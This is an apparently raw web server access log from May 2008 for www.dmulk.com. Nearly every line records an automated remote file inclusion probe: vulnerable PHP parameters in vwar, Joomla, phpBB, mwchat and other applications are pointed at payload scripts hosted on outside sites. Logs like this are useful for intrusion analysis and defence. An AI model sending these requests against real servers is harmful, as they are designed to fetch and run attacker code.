92.48.65.154 - - [28/May/2008:10:58:09 -0700] "GET /logs//modules/vwar/admin/errors.php?error=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.62.55.115 - - [28/May/2008:10:58:28 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.bestpaket.ru/netcat//dump/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:10:58:33 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:10:58:33 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:10:58:33 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.180.134.223 - - [28/May/2008:10:58:34 -0700] "GET /logs/access_080201.log//claroline/phpbb/page_tail.php?includePath=http://www.flirtythirties.com/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:10:58:39 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:10:58:39 -0700] "GET /logs//ashnews.php?pathtoashnews=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:10:58:39 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:10:58:39 -0700] "GET //ashnews.php?pathtoashnews=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:10:58:40 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:10:58:41 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:10:58:41 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:10:58:41 -0700] "GET /logs/access_080201.log//modules/vwar/admin/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:10:58:42 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:10:58:42 -0700] "GET //modules/vwar/admin/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.143.80 - - [28/May/2008:10:58:42 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:10:58:42 -0700] "GET /logs//modules/vwar/admin/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.143.80 - - [28/May/2008:10:58:42 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.143.80 - - [28/May/2008:10:58:42 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:10:58:48 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:10:58:49 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:10:58:49 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:10:58:49 -0700] "GET /plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:10:58:50 -0700] "GET /logs/plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:10:58:52 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:10:58:53 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:10:58:53 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:10:58:53 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:10:58:53 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:10:58:54 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:10:58:54 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:10:58:54 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:10:58:55 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:10:59:00 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:10:59:00 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:10:59:00 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [28/May/2008:10:59:02 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/koeluna/response.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
64.106.143.80 - - [28/May/2008:10:59:08 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.143.80 - - [28/May/2008:10:59:08 -0700] "GET //ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:10:59:08 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.143.80 - - [28/May/2008:10:59:08 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:10:59:08 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:10:59:08 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.143.80 - - [28/May/2008:10:59:16 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.143.80 - - [28/May/2008:10:59:16 -0700] "GET //ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.8.73.90 - - [28/May/2008:10:59:19 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:10:59:59 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:00:00 -0700] "GET //ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:00:03 -0700] "GET //include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:00:04 -0700] "GET //include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:00:06 -0700] "GET //include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [28/May/2008:11:00:09 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [28/May/2008:11:00:09 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:00:09 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
203.22.204.188 - - [28/May/2008:11:00:09 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:00:09 -0700] "GET //ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:00:09 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:00:11 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:11:00:11 -0700] "GET /logs/////////?phpbb_root_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 200 49427 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:11:00:14 -0700] "GET /////////?phpbb_root_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:00:30 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:00:31 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.106.143.80 - - [28/May/2008:11:00:32 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.190.24.146 - - [28/May/2008:11:00:32 -0700] "GET //include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
78.41.233.81 - - [28/May/2008:11:00:43 -0700] "GET //include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:00:43 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:00:43 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:00:43 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:11:00:44 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:00:45 -0700] "GET //include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.41.233.81 - - [28/May/2008:11:00:45 -0700] "GET //include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:00:48 -0700] "GET //include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:11:00:49 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:11:00:50 -0700] "GET /skin/zero_vote/error.php?dir=http://maxbidder.com/uploaded/508/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:11:00:54 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:00:54 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:11:00:54 -0700] "GET //ashnews.php?pathtoashnews=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:11:00:54 -0700] "GET /logs//ashnews.php?pathtoashnews=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:00:54 -0700] "GET //ashnews.php?pathtoashnews=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:00:55 -0700] "GET /logs//ashnews.php?pathtoashnews=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:00:56 -0700] "GET //include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.246.128.120 - - [28/May/2008:11:00:58 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:01:07 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:01:07 -0700] "GET //ashnews.php?pathtoashnews=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.62.26.18 - - [28/May/2008:11:01:07 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:01:07 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:11:01:13 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.148.252.24 - - [28/May/2008:11:01:14 -0700] "GET /skin/zero_vote/error.php?dir=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:01:32 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.48.65.154 - - [28/May/2008:11:01:37 -0700] "GET //modules/vwar/admin/errors.php?error=http://internetforall.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:01:45 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:11:01:45 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:01:45 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:11:01:45 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.228.149 - - [28/May/2008:11:01:45 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:11:01:45 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [28/May/2008:11:02:08 -0700] "GET /logs/access_080327.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:02:08 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:02:09 -0700] "GET //include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:02:09 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:02:13 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:02:13 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:02:13 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.106.143.80 - - [28/May/2008:11:02:14 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.143.80 - - [28/May/2008:11:02:14 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.143.80 - - [28/May/2008:11:02:14 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:11:02:16 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:11:02:16 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.62.55.102 - - [28/May/2008:11:02:16 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:02:17 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:02:18 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.106.143.80 - - [28/May/2008:11:02:18 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.106.229.35 - - [28/May/2008:11:02:18 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.106.143.80 - - [28/May/2008:11:02:18 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.143.80 - - [28/May/2008:11:02:18 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:11:02:18 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:02:18 -0700] "GET //include/lib.inc.php?site_path=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:11:02:19 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.63.40.205 - - [28/May/2008:11:02:19 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://yogyafree.net/rapat5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
